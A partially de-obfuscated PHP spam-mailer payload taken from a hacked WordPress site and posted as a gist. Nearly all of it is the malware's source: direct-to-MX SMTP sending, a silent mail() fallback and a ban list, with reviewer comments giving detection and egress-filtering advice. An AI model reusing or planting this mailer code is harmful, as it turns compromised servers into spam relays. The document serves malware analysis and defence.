@troelskn
Created March 23, 2016 09:30
Partially de-obfuscated payload script from a hacked wp site
<?php
// Entry point of the mailer payload. It decodes the operator's POST request, builds one job
// record per recipient, attempts direct-to-MX SMTP delivery, falls back to mail() for whatever
// is left, prints a machine-readable report and exits.
// NOTE(review): $u11, $enizl83 and the STEP_*/SOCKET_*/DNS_* constants are not defined anywhere
// in this listing; presumably they are set by a part of the payload that was not recovered.
// Detection note: every status line has the shape PHP_OS+md5(<numeric literal>)+<code>+[[...]]
// and the md5() arguments are literals, so the markers are constant strings in the HTTP response.
if (FALSE == nplqy70($u11, $pakfn17)) {
// The request did not carry the expected fields: report code 01 and stop.
echo PHP_OS . '+' . md5(0987654321) . '+01+[[]]
';
exit;
}
$jkber87 = array();
for ($mrkfo51 = 0; $mrkfo51 < count($pakfn17['toList']); $mrkfo51++) {
// Per-recipient job record. g_* fields hold the generated message, s_* the SMTP session
// state, l_* the outcome that is reported back at the end.
$wxfxn29 = array(
'id' => $mrkfo51,
'g_mailto' => "",
'g_mailto+' => "",
'g_mailfrom' => "",
'g_mailfrom+' => "",
'g_domainto' => "",
'g_domainfrom' => "",
'g_namefirst' => "",
'g_namelast' => "",
'g_body' => "",
'g_subject' => "",
'g_fff' => FALSE,
'g_header' => "",
'g_headerfrom' => "",
's_header' => "",
's_mxhost' => "",
's_mxaddr' => FALSE,
's_sock' => FALSE,
's_time' => time() ,
's_step' => constant('STEP_CONNECT') ,
's_port' => 25,
's_datain' => "",
's_dataout' => "",
's_trig' => FALSE,
'l_err' => "",
'l_done' => FALSE,
'l_way' => 0,
'l_failsmtp' => FALSE,
'l_smtp_end' => FALSE,
'l_smtp_log' => "",
);
if (FALSE == rdble50($u11, $pakfn17['toList'][$mrkfo51], $pakfn17, $wxfxn29)) {
// Unparseable recipient entry: echo it back (XOR 2 + base64 via dcydj64) with code 02.
echo PHP_OS . '+' . md5(1111111111) . '+02+[[' . dcydj64($u11, $pakfn17['toList'][$mrkfo51]) . ']]
';
continue;
}
$jkber87[] = $wxfxn29;
}
// Load the ban list persisted by an earlier run (see lqpzi27) and report its keys (code 06).
$siytz64 = lqpzi27($u11, 1);
if (count($siytz64) > 0) {
echo PHP_OS . '+' . md5(1111111111) . '+06+[[' . dcydj64($u11, 'Banned start: ' . implode(',', array_keys($siytz64))) . ']]
';
}
// Order of work: SMTP loop, mail() fallback, result report, ban list written back to disk.
wzuqo15($u11, $jkber87, $siytz64, $enizl83);
yqmbe45($u11, $jkber87);
ayyes70($u11, $jkber87);
ksqbs71($u11, $siytz64);
if (count($siytz64) > 0) {
echo PHP_OS . '+' . md5(1111111111) . '+07+[[' . dcydj64($u11, 'Banned stop: ' . implode(',', array_keys($siytz64))) . ']]
';
}
exit;
// Prints the run summary for the operator.
// For each job flagged l_failsmtp it emits a code-04 line carrying "<recipient> :: <error>"
// (encoded by dcydj64). It then prints either a code-04 line with an empty payload when
// nothing was delivered, or "OK+<md5>+<delivered>+<total>[<ways>]", where <ways> is the
// concatenation of each delivered job's l_way (1 = direct SMTP, 2 = mail(), as set elsewhere
// in this file).
function ayyes70($u11, $jkber87)
{
$kiucs36 = 0;
$cxitl5 = "";
for ($mrkfo51 = 0; $mrkfo51 < count($jkber87); $mrkfo51++) {
if ($jkber87[$mrkfo51]['l_failsmtp'] == TRUE) {
echo "" . PHP_OS . '+' . md5(2222222222) . '+04+[[' . dcydj64($u11, $jkber87[$mrkfo51]['g_mailto'] . ' :: ' . $jkber87[$mrkfo51]['l_err']) . ']]
';
}
if ($jkber87[$mrkfo51]['l_done'] == TRUE) {
$cxitl5.= $jkber87[$mrkfo51]['l_way'];
$kiucs36++;
}
}
if ($kiucs36 == 0) {
echo PHP_OS . '+' . md5(0987654321) . '+04+[[]]
';
}
else {
echo 'OK+' . md5(1234567890) . '+' . $kiucs36 . '+' . count($jkber87) . '[' . $cxitl5 . ']
';
}
}
// Fallback delivery through PHP's mail() for every job the SMTP loop did not complete.
// Returns FALSE when mail() is unavailable; otherwise returns nothing and records the result
// in each job (l_done, and l_way = 2 on success).
// When g_fff is set, the From/Reply-To headers are prepended and '-f<sender>' is passed as
// mail()'s additional-parameters argument. Warnings are suppressed with @, so failures leave
// no trace in the PHP error log; the local MTA's log is the place to look for this traffic.
function yqmbe45($u11, &$jkber87)
{
if (!function_exists('mail')) {
return FALSE;
}
for ($mrkfo51 = 0; $mrkfo51 < count($jkber87); $mrkfo51++) {
// Already delivered by the direct SMTP path.
if ($jkber87[$mrkfo51]['l_done'] == TRUE) {
continue;
}
if ($jkber87[$mrkfo51]['g_fff']) {
if (@mail($jkber87[$mrkfo51]['g_mailto+'], $jkber87[$mrkfo51]['g_subject'], $jkber87[$mrkfo51]['g_body'], $jkber87[$mrkfo51]['g_headerfrom'] . $jkber87[$mrkfo51]['g_header'], '-f' . $jkber87[$mrkfo51]['g_mailfrom'])) {
$jkber87[$mrkfo51]['l_done'] = TRUE;
$jkber87[$mrkfo51]['l_way'] = 2;
}
else {
$jkber87[$mrkfo51]['l_done'] = FALSE;
}
}
else {
if (@mail($jkber87[$mrkfo51]['g_mailto+'], $jkber87[$mrkfo51]['g_subject'], $jkber87[$mrkfo51]['g_body'], $jkber87[$mrkfo51]['g_header'])) {
$jkber87[$mrkfo51]['l_done'] = TRUE;
$jkber87[$mrkfo51]['l_way'] = 2;
}
else {
$jkber87[$mrkfo51]['l_done'] = FALSE;
}
}
}
}
// Drives the SMTP state machine: while rzdjn52() reports at least one unfinished job, run one
// pass of evuho1() and sleep 25 ms. The loop ends only once every job has l_smtp_end set.
function wzuqo15($u11, &$jkber87, &$siytz64, $enizl83)
{
while (rzdjn52($u11, $jkber87)) {
evuho1($u11, $jkber87, $siytz64, $enizl83);
usleep(25000);
}
}
// Ends the SMTP session of job $jepvv39: closes its socket if one is open, stores the reason
// in l_err as "[port][step]text" (the port prefix only when $oahyj37 is TRUE, line breaks in
// the text replaced by spaces), copies $oahyj37 into l_failsmtp and sets l_smtp_end.
// Note that the QUIT step also calls this with 'Success!' and TRUE, so l_failsmtp is set for
// completed sessions too, not only for rejections.
function vsari64($u11, &$jkber87, $jepvv39, $degoh72, $oahyj37)
{
if ($jkber87[$jepvv39]['s_sock'] != FALSE) {
dgsvq12($u11, $jkber87[$jepvv39]['s_sock']);
}
$dqwpy49 = "";
if ($oahyj37 == TRUE) {
$dqwpy49 = '[' . $jkber87[$jepvv39]['s_port'] . ']';
}
$jkber87[$jepvv39]['l_err'] = $dqwpy49 . '[' . $jkber87[$jepvv39]['s_step'] . ']' . trim(preg_replace('/
/', ' ', $degoh72));
$jkber87[$jepvv39]['l_failsmtp'] = $oahyj37;
$jkber87[$jepvv39]['l_smtp_end'] = TRUE;
return;
}
// One pass of the SMTP state machine over every unfinished job.
// Per job: enforce a 20-second timeout on the current step (with a single retry on port 587
// while still connecting), drop jobs whose MX host matches a key in the ban list $siytz64,
// then advance s_step: CONNECT -> CONNECTED -> EHLO -> MAILFROM -> RCPTTO -> DATA -> BODY -> QUIT.
// Everything sent and received is appended to l_smtp_log; an unexpected reply code ends the
// job through vsari64(), after fbflb66() has had the chance to ban the MX host.
// Detection note: the web server process opens outbound TCP connections to port 25, then 587,
// of third-party mail exchangers and greets them with EHLO <site's own host name>.
function evuho1($u11, &$jkber87, &$siytz64, $enizl83)
{
$cslag77 = time();
foreach($jkber87 as $jepvv39 => $wxfxn29) {
if ($wxfxn29['l_smtp_end'] == TRUE) {
continue;
}
// Step timeout: more than 20 seconds since s_time was last refreshed.
if ($wxfxn29['s_time'] + 20 < $cslag77) {
if ($jkber87[$jepvv39]['s_step'] == constant('STEP_CONNECT') && $jkber87[$jepvv39]['s_port'] != 587) {
// Connect attempt timed out: close the socket and retry once on port 587.
dgsvq12($u11, $jkber87[$jepvv39]['s_sock']);
$jkber87[$jepvv39]['s_port'] = 587;
$jkber87[$jepvv39]['s_time'] = time();
continue;
}
vsari64($u11, $jkber87, $jepvv39, 'timeout', FALSE);
continue;
}
// zfuri16() maps the job's MX host to a rule key; a non-empty ban entry for that key ends the job.
if (!empty($siytz64[zfuri16($u11, $enizl83, $jkber87[$jepvv39]) ])) {
vsari64($u11, $jkber87, $jepvv39, 'Bcnf!', TRUE);
continue;
}
switch ($jkber87[$jepvv39]['s_step']) {
case constant('STEP_CONNECT'):
if ($jkber87[$jepvv39]['s_mxaddr'] == FALSE) {
// gethostbyname() returns its input unchanged on failure, hence the dotted-quad check.
// The pattern is unanchored, so it is only a loose sanity test.
$jkber87[$jepvv39]['s_mxaddr'] = @gethostbyname($jkber87[$jepvv39]['s_mxhost']);
if (!@preg_match('/([0-9]{1,3}\.?){4}/', $jkber87[$jepvv39]['s_mxaddr'])) {
vsari64($u11, $jkber87, $jepvv39, 'resolve mx', FALSE);
break;
}
}
$rpfsm11 = 0;
$ftcug81 = '';
// Non-blocking connect (last argument TRUE) with a 2-second timeout value.
$jkber87[$jepvv39]['s_sock'] = avcbc52($u11, $jkber87[$jepvv39]['s_sock'], constant('SOCKET_PROTO_TCP') , $jkber87[$jepvv39]['s_mxaddr'], $jkber87[$jepvv39]['s_port'], 2, $rpfsm11, $ftcug81, TRUE);
if ($jkber87[$jepvv39]['s_sock'] == FALSE) {
break;
}
// Error 0 means connected; 56 / 10056 are presumably the "socket is already connected"
// codes (EISCONN / WSAEISCONN) seen when connect is re-issued on a non-blocking socket.
if ($rpfsm11 == 0 || $rpfsm11 === 56 || $rpfsm11 === 10056) {
$jkber87[$jepvv39]['s_step'] = constant('STEP_CONNECTED');
dzxhy75($u11, $jkber87[$jepvv39]['s_sock'], 15);
$jkber87[$jepvv39]['s_time'] = time();
}
break;
case constant('STEP_CONNECTED'):
// Wait for the server banner; anything other than 220 ends the job.
if (bdcnw53($u11, $jkber87, $jepvv39)) {
$jkber87[$jepvv39]['l_smtp_log'].= $jkber87[$jepvv39]['s_datain'] . '
';
if (substr($jkber87[$jepvv39]['s_datain'], 0, 3) != 220) {
$yohad14 = fbflb66($u11, $enizl83, $jkber87[$jepvv39], $siytz64);
vsari64($u11, $jkber87, $jepvv39, $yohad14 . $jkber87[$jepvv39]['s_datain'], TRUE);
break;
}
$jkber87[$jepvv39]['s_datain'] = "";
$jkber87[$jepvv39]['s_dataout'] = 'EHLO ' . $jkber87[$jepvv39]['g_domainfrom'] . '
';
$jkber87[$jepvv39]['l_smtp_log'].= $jkber87[$jepvv39]['s_dataout'] . '
';
$jkber87[$jepvv39]['s_step'] = constant('STEP_EHLO');
$jkber87[$jepvv39]['s_time'] = time();
}
break;
case constant('STEP_EHLO'):
// Flush the EHLO line, then expect 250 before queueing MAIL FROM.
if (brrgv69($u11, $jkber87, $jepvv39)) {
if (bdcnw53($u11, $jkber87, $jepvv39)) {
$jkber87[$jepvv39]['l_smtp_log'].= $jkber87[$jepvv39]['s_datain'] . '
';
if (substr($jkber87[$jepvv39]['s_datain'], 0, 3) != 250) {
$yohad14 = fbflb66($u11, $enizl83, $jkber87[$jepvv39], $siytz64);
vsari64($u11, $jkber87, $jepvv39, $yohad14 . $jkber87[$jepvv39]['s_datain'], TRUE);
break;
}
$jkber87[$jepvv39]['s_datain'] = "";
$jkber87[$jepvv39]['s_dataout'] = 'MAIL FROM:<' . $jkber87[$jepvv39]['g_mailfrom'] . '>
';
$jkber87[$jepvv39]['l_smtp_log'].= $jkber87[$jepvv39]['s_dataout'] . '
';
$jkber87[$jepvv39]['s_step'] = constant('STEP_MAILFROM');
$jkber87[$jepvv39]['s_time'] = time();
}
break;
}
break;
case constant('STEP_MAILFROM'):
// Expect 250 for MAIL FROM, then queue RCPT TO.
if (brrgv69($u11, $jkber87, $jepvv39)) {
if (bdcnw53($u11, $jkber87, $jepvv39)) {
$jkber87[$jepvv39]['l_smtp_log'].= $jkber87[$jepvv39]['s_datain'] . '
';
if (substr($jkber87[$jepvv39]['s_datain'], 0, 3) != 250) {
$yohad14 = fbflb66($u11, $enizl83, $jkber87[$jepvv39], $siytz64);
vsari64($u11, $jkber87, $jepvv39, $yohad14 . $jkber87[$jepvv39]['s_datain'], TRUE);
break;
}
$jkber87[$jepvv39]['s_datain'] = "";
$jkber87[$jepvv39]['s_dataout'] = 'RCPT TO:<' . $jkber87[$jepvv39]['g_mailto'] . '>
';
$jkber87[$jepvv39]['l_smtp_log'].= $jkber87[$jepvv39]['s_dataout'] . '
';
$jkber87[$jepvv39]['s_step'] = constant('STEP_RCPTTO');
$jkber87[$jepvv39]['s_time'] = time();
}
break;
}
break;
case constant('STEP_RCPTTO'):
// Expect 250 or 251 for RCPT TO, then queue DATA.
if (brrgv69($u11, $jkber87, $jepvv39)) {
if (bdcnw53($u11, $jkber87, $jepvv39)) {
$jkber87[$jepvv39]['l_smtp_log'].= $jkber87[$jepvv39]['s_datain'] . '
';
if (substr($jkber87[$jepvv39]['s_datain'], 0, 3) != 250 && substr($jkber87[$jepvv39]['s_datain'], 0, 3) != 251) {
$yohad14 = fbflb66($u11, $enizl83, $jkber87[$jepvv39], $siytz64);
vsari64($u11, $jkber87, $jepvv39, $yohad14 . $jkber87[$jepvv39]['s_datain'], TRUE);
break;
}
$jkber87[$jepvv39]['s_datain'] = "";
$jkber87[$jepvv39]['s_dataout'] = 'DATA
';
$jkber87[$jepvv39]['l_smtp_log'].= $jkber87[$jepvv39]['s_dataout'] . '
';
$jkber87[$jepvv39]['s_step'] = constant('STEP_DATA');
$jkber87[$jepvv39]['s_time'] = time();
}
break;
}
break;
case constant('STEP_DATA'):
// Expect 354, then queue headers, body and the terminating "." line.
if (brrgv69($u11, $jkber87, $jepvv39)) {
if (bdcnw53($u11, $jkber87, $jepvv39)) {
$jkber87[$jepvv39]['l_smtp_log'].= $jkber87[$jepvv39]['s_datain'] . '
';
if (substr($jkber87[$jepvv39]['s_datain'], 0, 3) != 354) {
$yohad14 = fbflb66($u11, $enizl83, $jkber87[$jepvv39], $siytz64);
vsari64($u11, $jkber87, $jepvv39, $yohad14 . $jkber87[$jepvv39]['s_datain'], TRUE);
break;
}
$jkber87[$jepvv39]['s_datain'] = "";
$jkber87[$jepvv39]['s_dataout'] = $jkber87[$jepvv39]['s_header'] . '
' . $jkber87[$jepvv39]['g_body'] . '
.
';
$jkber87[$jepvv39]['l_smtp_log'].= $jkber87[$jepvv39]['s_dataout'] . '
';
$jkber87[$jepvv39]['s_step'] = constant('STEP_BODY');
$jkber87[$jepvv39]['s_time'] = time();
}
break;
}
break;
case constant('STEP_BODY'):
// A 250 after the message body counts as delivered: l_done = TRUE, l_way = 1.
if (brrgv69($u11, $jkber87, $jepvv39)) {
if (bdcnw53($u11, $jkber87, $jepvv39)) {
$jkber87[$jepvv39]['l_smtp_log'].= $jkber87[$jepvv39]['s_datain'] . '
';
if (substr($jkber87[$jepvv39]['s_datain'], 0, 3) != 250) {
$yohad14 = fbflb66($u11, $enizl83, $jkber87[$jepvv39], $siytz64);
vsari64($u11, $jkber87, $jepvv39, $yohad14 . $jkber87[$jepvv39]['s_datain'], TRUE);
break;
}
$jkber87[$jepvv39]['s_datain'] = "";
$jkber87[$jepvv39]['s_dataout'] = 'QUIT
';
$jkber87[$jepvv39]['l_smtp_log'].= $jkber87[$jepvv39]['s_dataout'] . '
';
$jkber87[$jepvv39]['s_step'] = constant('STEP_QUIT');
$jkber87[$jepvv39]['s_time'] = time();
$jkber87[$jepvv39]['l_done'] = TRUE;
$jkber87[$jepvv39]['l_way'] = 1;
}
break;
}
break;
case constant('STEP_QUIT'):
// Once QUIT has been flushed the session is closed without waiting for the reply.
if (brrgv69($u11, $jkber87, $jepvv39)) {
vsari64($u11, $jkber87, $jepvv39, 'Success!', TRUE);
}
break;
}
}
}
// Polls job $jepvv39 for a server reply. Returns TRUE only when s_datain already holds data
// and nothing further arrived on this pass; a pass that reads new data stores it in s_datain
// (overwriting, not appending) and returns FALSE so the caller looks again next time.
// When s_trig is FALSE no read is attempted at all.
// Error codes 35, 10035, 11 and 10060 are treated as "no data yet"; presumably these are the
// would-block / timeout codes of the supported platforms. Any other code ends the job.
function bdcnw53($u11, &$jkber87, $jepvv39)
{
$rpfsm11 = 0;
$ftcug81 = "";
if ($jkber87[$jepvv39]['s_trig'] == FALSE) {
if (strlen($jkber87[$jepvv39]['s_datain']) != 0) {
return TRUE;
}
return FALSE;
}
$bsxhw62 = mzezd77($u11, $jkber87[$jepvv39]['s_sock'], 4086, $rpfsm11, $ftcug81);
if ($bsxhw62 == FALSE || $bsxhw62 == "") {
if ($rpfsm11 != 35 && $rpfsm11 != 10035 && $rpfsm11 != 11 && $rpfsm11 != 10060) {
vsari64($u11, $jkber87, $jepvv39, $ftcug81, FALSE);
return FALSE;
}
if (strlen($jkber87[$jepvv39]['s_datain']) != 0) {
return TRUE;
}
return FALSE;
}
$jkber87[$jepvv39]['s_datain'] = $bsxhw62;
return FALSE;
}
// Flushes the pending output of job $jepvv39. Returns TRUE once s_dataout is empty (nothing
// queued, or everything written), FALSE while bytes remain or the write failed.
// A partial write removes the sent prefix from s_dataout. Write errors other than
// 35/10035/11/10060 (the same "try again" set used by bdcnw53) end the job via vsari64().
function brrgv69($u11, &$jkber87, $jepvv39)
{
$rpfsm11 = 0;
$ftcug81 = "";
if (strlen($jkber87[$jepvv39]['s_dataout']) == 0) {
return TRUE;
}
$bsxhw62 = nmavu24($u11, $jkber87[$jepvv39]['s_sock'], $jkber87[$jepvv39]['s_dataout'], $rpfsm11, $ftcug81);
if ($bsxhw62 == FALSE) {
if ($rpfsm11 != 35 && $rpfsm11 != 10035 && $rpfsm11 != 11 && $rpfsm11 != 10060) {
vsari64($u11, $jkber87, $jepvv39, $ftcug81, FALSE);
}
return FALSE;
}
// $bsxhw62 is the number of bytes written; keep only the unsent remainder.
$jkber87[$jepvv39]['s_dataout'] = substr($jkber87[$jepvv39]['s_dataout'], $bsxhw62);
if (strlen($jkber87[$jepvv39]['s_dataout']) == 0) {
return TRUE;
}
return FALSE;
}
// Marks which jobs should attempt a read on the next pass (s_trig) and returns TRUE while at
// least one job has not reached l_smtp_end.
// Without the sockets extension every unfinished job is simply triggered. With it, jobs that
// are still connecting are triggered unconditionally and the remaining sockets are polled
// with socket_select() using a zero timeout; only sockets reported readable keep s_trig.
function rzdjn52($u11, &$jkber87)
{
$oghrj40 = FALSE;
if (constant('SOCKET_TYPE') != constant('SOCKET_TYPE_SOCKET')) {
foreach(array_keys($jkber87) as $jepvv39) {
if ($jkber87[$jepvv39]['l_smtp_end'] != TRUE) {
$jkber87[$jepvv39]['s_trig'] = TRUE;
$oghrj40 = TRUE;
}
}
return $oghrj40;
}
$pdlqy10 = array();
foreach(array_keys($jkber87) as $jepvv39) {
if ($jkber87[$jepvv39]['l_smtp_end'] != TRUE) {
if ($jkber87[$jepvv39]['s_sock'] == 0 || $jkber87[$jepvv39]['s_step'] == constant('STEP_CONNECT')) {
$jkber87[$jepvv39]['s_trig'] = TRUE;
}
else {
$jkber87[$jepvv39]['s_trig'] = FALSE;
$pdlqy10[] = $jkber87[$jepvv39]['s_sock'];
}
$oghrj40 = TRUE;
}
}
if (count($pdlqy10) == 0) {
return $oghrj40;
}
// socket_select() rewrites $pdlqy10 in place so that it lists only the readable sockets.
$thfyk26 = @socket_select($pdlqy10, $nuvll55 = NULL, $tlply10 = NULL, 0);
if ($thfyk26 == FALSE || $thfyk26 == 0) {
return $oghrj40;
}
// This resets s_trig on every job, including those triggered unconditionally above.
foreach(array_keys($jkber87) as $jepvv39) {
$jkber87[$jepvv39]['s_trig'] = FALSE;
foreach($pdlqy10 as $hbjou68) {
if ($jkber87[$jepvv39]['s_sock'] == $hbjou68) {
$jkber87[$jepvv39]['s_trig'] = TRUE;
break;
}
}
}
return $oghrj40;
}
// Selects the network API the payload will use and records it in the SOCKET_TYPE constant:
// the sockets extension first, then fsockopen(), then stream_socket_client(). Returns FALSE
// (SOCKET_TYPE_NO) when none is available. Neither parameter is used.
// NOTE(review): nothing in this listing calls this function; presumably it is invoked from the
// unpublished part of the payload before the entry-point code runs.
// Hardening note: disabling a single one of these functions does not stop the mailer, because
// it falls through to the next API; egress filtering of SMTP from the web tier does.
function kkked94($u11, $ybmww10)
{
if (function_exists('socket_create') && function_exists('socket_connect') && function_exists('socket_read') && function_exists('socket_write')) {
define('SOCKET_TYPE', constant('SOCKET_TYPE_SOCKET'));
return TRUE;
}
if (function_exists('fsockopen')) {
define('SOCKET_TYPE', constant('SOCKET_TYPE_FSOCKET'));
return TRUE;
}
if (function_exists('stream_socket_client')) {
define('SOCKET_TYPE', constant('SOCKET_TYPE_STREAM'));
return TRUE;
}
define('SOCKET_TYPE', constant('SOCKET_TYPE_NO'));
return FALSE;
}
// Fills job record $wxfxn29 for one recipient entry $hqboq32. Judging by the pattern and the
// way the captures are used, the entry has the form "first;last;user@domain", with both name
// parts optional. Returns FALSE when the entry does not yield an address and a domain.
// The sender is <fromLogin>@<hostFrom>, i.e. an address on the compromised site's own host
// name (hostFrom is derived from the Host header in nplqy70), and subject/body come from the
// operator's templates with %R_NAME%, %R_LNAME% and %MAIL_EN% substituted.
// Detection note: outgoing messages carry a fixed header block (X-Priority: 3 (Normal),
// text/html, iso-8859-1, 8bit) and a Message-ID of the form <7hex-5hex-2hex@hostFrom>.
function rdble50($u11, $hqboq32, $pakfn17, &$wxfxn29)
{
$snahi3 = array();
if (FALSE === @preg_match('/(.*?;)?(.*?;)?(.+@(.+)?);?/', $hqboq32, $snahi3)) {
return FALSE;
}
if (!isset($snahi3) || count($snahi3) != 5) {
return FALSE;
}
$wxfxn29['g_namefirst'] = @ucfirst(str_replace(';', "", $snahi3[1]));
$wxfxn29['g_namelast'] = @ucfirst(str_replace(';', "", $snahi3[2]));
$wxfxn29['g_mailto'] = str_replace(';', "", $snahi3[3]);
$wxfxn29['g_domainto'] = str_replace(';', "", $snahi3[4]);
if (!isset($wxfxn29['g_mailto']) || $wxfxn29['g_mailto'] == "") {
return FALSE;
}
if (!isset($wxfxn29['g_domainto']) || $wxfxn29['g_domainto'] == "") {
return FALSE;
}
// 'g_mailto+' is the display form: "First Last" <addr> when a first name is present.
if (isset($wxfxn29['g_namefirst']) && $wxfxn29['g_namefirst'] != "") {
$wxfxn29['g_mailto+'] = '"' . $wxfxn29['g_namefirst'] . ' ' . $wxfxn29['g_namelast'] . '" <' . $wxfxn29['g_mailto'] . '>';
}
else {
$wxfxn29['g_mailto+'] = $wxfxn29['g_mailto'];
}
$wxfxn29['g_domainfrom'] = $pakfn17['hostFrom'];
// g_fff decides whether yqmbe45() sets From/Reply-To and the '-f' sender for mail(); it is
// turned off when hostFrom is a bare IPv4 address or when safe_mode is enabled.
if (preg_match('/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/', $pakfn17['hostFrom']) || @ini_get('safe_mode')) {
$wxfxn29['g_fff'] = FALSE;
}
else {
$wxfxn29['g_fff'] = TRUE;
}
$wxfxn29['g_mailfrom'] = $pakfn17['fromLogin'] . '@' . $pakfn17['hostFrom'];
if (isset($pakfn17['fromName']) && $pakfn17['fromName'] != "") {
$wxfxn29['g_mailfrom+'] = $pakfn17['fromName'] . ' <' . $wxfxn29['g_mailfrom'] . '>';
}
else {
$wxfxn29['g_mailfrom+'] = $wxfxn29['g_mailfrom'];
}
// Resolve the recipient domain's preferred mail exchanger (FALSE when none is found).
$wxfxn29['s_mxhost'] = sgzvr68($u11, $wxfxn29['g_domainto']);
$wxfxn29['g_subject'] = @str_replace('%R_NAME%', $wxfxn29['g_namefirst'], $pakfn17['subjTempl']);
$wxfxn29['g_subject'] = @str_replace('%R_LNAME%', $wxfxn29['g_namelast'], $wxfxn29['g_subject']);
$wxfxn29['g_body'] = @str_replace('%R_NAME%', $wxfxn29['g_namefirst'], $pakfn17['bodyTempl']);
$wxfxn29['g_body'] = @str_replace('%R_LNAME%', $wxfxn29['g_namelast'], $wxfxn29['g_body']);
// %MAIL_EN% becomes the recipient address encoded with dcydj64() (XOR 2, then base64).
$wxfxn29['g_body'] = @str_replace('%MAIL_EN%', dcydj64($u11, $wxfxn29['g_mailto']) , $wxfxn29['g_body']);
$wxfxn29['g_header'] = 'X-Priority: 3 (Normal)
';
$wxfxn29['g_header'].= 'MIME-Version: 1.0
';
$wxfxn29['g_header'].= 'Content-Type: text/html; charset="iso-8859-1"
';
$wxfxn29['g_header'].= 'Content-Transfer-Encoding: 8bit
';
$wxfxn29['g_headerfrom'] = 'From: ' . $wxfxn29['g_mailfrom+'] . '
';
$wxfxn29['g_headerfrom'].= 'Reply-To:' . $wxfxn29['g_mailfrom+'] . '
';
// s_header is the full header block used on the direct SMTP path.
$wxfxn29['s_header'] = 'Date: ' . @date('D, j M Y G:i:s O') . '
';
$wxfxn29['s_header'].= $wxfxn29['g_headerfrom'];
$wxfxn29['s_header'].= 'Message-ID: <' . preg_replace('/(.{7})(.{5})(.{2}).*/', '$1-$2-$3', md5(time())) . '@' . $pakfn17['hostFrom'] . '>
';
$wxfxn29['s_header'].= 'To: ' . $wxfxn29['g_mailto+'] . '
';
$wxfxn29['s_header'].= 'Subject: ' . $wxfxn29['g_subject'] . '
';
$wxfxn29['s_header'].= $wxfxn29['g_header'];
return TRUE;
}
// Returns the mail exchanger with the lowest preference value for domain $ttgac24, or FALSE
// when none can be found. Uses getmxrr() when PHP provides it; otherwise falls back to the
// payload's own DNS client (kymrg16), which needs a usable socket API.
function sgzvr68($u11, $ttgac24)
{
$tivvs87 = array();
$iwzsk88 = array();
if (function_exists('getmxrr')) {
@getmxrr($ttgac24, $tivvs87, $iwzsk88);
}
else {
if (constant('SOCKET_TYPE') == constant('SOCKET_TYPE_NO')) {
return FALSE;
}
$thfyk26 = kymrg16($u11, $ttgac24, constant('DNS_TYPE_MX'));
if ($thfyk26 == FALSE || !isset($thfyk26['ans'])) {
return FALSE;
}
// Keep only MX answers: host names in $tivvs87, preferences in $iwzsk88 (parallel arrays).
foreach($thfyk26['ans'] as $mrtnn50) {
if ($mrtnn50['type'] == constant('DNS_TYPE_MX')) {
$tivvs87[] = $mrtnn50['data'];
$iwzsk88[] = $mrtnn50['preference'];
}
}
}
if (count($tivvs87) == 0) {
return FALSE;
}
$gwcxa40 = array_keys($iwzsk88, min($iwzsk88));
return $tivvs87[$gwcxa40[0]];
}
// Reverse-resolves IPv4 address $ttgac24 to a host name. Uses gethostbyaddr() when available,
// otherwise sends a PTR query through kymrg16(). Returns FALSE on the explicit failure paths
// and falls off the end (NULL) when the answer section holds no PTR record.
// NOTE(review): in this listing the reversed octets and 'in-addr.arpa' are concatenated with no
// separator between them; this may be another string literal lost in de-obfuscation.
function zozoy17($u11, $ttgac24)
{
if (function_exists('gethostbyaddr')) {
return gethostbyaddr($ttgac24);
}
if (constant('SOCKET_TYPE') == constant('SOCKET_TYPE_NO')) {
return FALSE;
}
if (!preg_match('/^([0-9]{1,3})\.([0-9]{1,3})\.([0-9]{1,3})\.([0-9]{1,3})$/', $ttgac24, $xannw62)) {
return FALSE;
}
if (empty($xannw62) || count($xannw62) != 5) {
return FALSE;
}
$thfyk26 = kymrg16($u11, $xannw62[4] . $xannw62[3] . $xannw62[2] . $xannw62[1] . 'in-addr.arpa', constant('DNS_TYPE_PTR'));
if ($thfyk26 == FALSE || !isset($thfyk26['ans'])) {
return FALSE;
}
foreach($thfyk26['ans'] as $mrtnn50) {
if ($mrtnn50['type'] == constant('DNS_TYPE_PTR')) {
return $mrtnn50['data'];
}
}
}
// Parses the operator's request into $pakfn17. Returns FALSE when the request is unusable.
// POST fields are identified only by the first character of their name: 'l' = recipient list
// ('#'-separated), 'd' = job data with <USER>, <NAME>, <SUBJ> and <SBODY> sections, and the
// mere presence of an 'e' field means both values are encoded (see zqrkk46).
// No authentication check is visible in this listing: any request with at least two POST
// fields of the right shape is accepted (a check may exist in the unpublished part).
// Detection note: look for POSTs to a PHP file with short parameter names starting with l/d/e
// and, in the encoded case, base64-looking bodies.
function nplqy70($u11, &$pakfn17)
{
if (count($_POST) < 2) {
return FALSE;
}
$qqhjy59 = false;
$djedc15 = $pwzsl80 = "";
foreach(array_keys($_POST) as $ggkku5) {
if ($ggkku5[0] == 'l') {
$djedc15 = $ggkku5;
}
if ($ggkku5[0] == 'd') {
$pwzsl80 = $ggkku5;
}
if ($ggkku5[0] == 'e') {
$qqhjy59 = true;
}
}
if ($djedc15 == "" || $pwzsl80 == "") {
return FALSE;
}
$yheud27 = zqrkk46($u11, $djedc15, $qqhjy59);
$qxaeg20 = zqrkk46($u11, $pwzsl80, $qqhjy59);
if ($yheud27 == FALSE || $qxaeg20 == FALSE) {
return FALSE;
}
$pakfn17['toList'] = @preg_split('/#/', $yheud27);
$pakfn17['fromLogin'] = $pakfn17['fromName'] = $pakfn17['subjTempl'] = $pakfn17['bodyTempl'] = "";
$snahi3 = array();
// Sender local part, display name, subject template and body template.
if (FALSE !== @preg_match('/<USER>(.*?)<\/USER>/ism', $qxaeg20, $snahi3) && isset($snahi3) && count($snahi3) > 1) {
$pakfn17['fromLogin'] = $snahi3[1];
}
if (FALSE !== @preg_match('/<NAME>(.*?)<\/NAME>/ism', $qxaeg20, $snahi3) && isset($snahi3) && count($snahi3) > 1) {
$pakfn17['fromName'] = $snahi3[1];
}
if (FALSE !== @preg_match('/<SUBJ>(.*?)<\/SUBJ>/ism', $qxaeg20, $snahi3) && isset($snahi3) && count($snahi3) > 1) {
$pakfn17['subjTempl'] = $snahi3[1];
}
if (FALSE !== @preg_match('/<SBODY>(.*?)<\/SBODY>/ism', $qxaeg20, $snahi3) && isset($snahi3) && count($snahi3) > 1) {
$pakfn17['bodyTempl'] = $snahi3[1];
}
